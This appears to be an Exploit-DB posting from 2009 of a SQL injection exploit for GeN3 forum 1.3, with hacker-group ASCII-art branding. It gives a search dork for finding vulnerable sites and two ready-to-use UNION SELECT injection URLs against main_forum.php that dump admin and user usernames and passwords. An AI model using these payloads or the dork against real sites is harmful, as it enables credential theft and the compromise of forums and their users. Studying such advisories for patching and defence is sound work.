GeN3 forum 1.3 - SQL Injection

EDB-ID:

10299




Platform:

PHP

Date:

2009-12-04


# Author: Dr.0rYX & Cr3w-DZ
# Software Link: http://www.ptcpay.com/shop/browse_products.php
###############################


         NN         N     AAAAAA     SSSSSSSSS
         NNN       N   A           A    S
         N NN      N   A           A    S
         N  NN     N   A           A    S                        TTTTTT   EEEEE    AAAA    MM   MM
         N   NN    N   AAAAAAAA    SSSSSSSSS              TT      E         A      A   M M M M
         N     NN  N   A           A                   S             TT      E         A       A  M  M   M
         N      NN N   A           A                   S             TT      EEEE    AAAAAA  M       M
         N       NNN   A           A                   S             TT      E         A       A  M       M
         N        NN   A            A                   S             TT      E         A       A  M       M
         N          N   A            A    SSSSSSSSS             TT      EEEEE   A       A  M       M


                                                               ALGERIAN HACKER
                **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            GeN3 forum V1.3 SQL injection vulnerability
  [!] Author    : Dr.0rYX & Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://www.ptcpay.com
  [+] script   : GeN3 Version 1.3
  [+] Download : http://www.ptcpay.com/shop/browse_products.php
  [+] Version() : 1.3
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"main_forum.php?cat="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/path/main_forum.php?cat=[N.A.S.T ]

  [ Exploit ]

  http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--

  http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(userid,0x3a,Username,0x3a,password),3,4,5,6,7+FROM+users--

  [  GReet ]

  [+] :Cr3W-DZ , xcv-dz , CLAW , kader11000 , exploit-db.com , ALL HACKERS MUSLIMS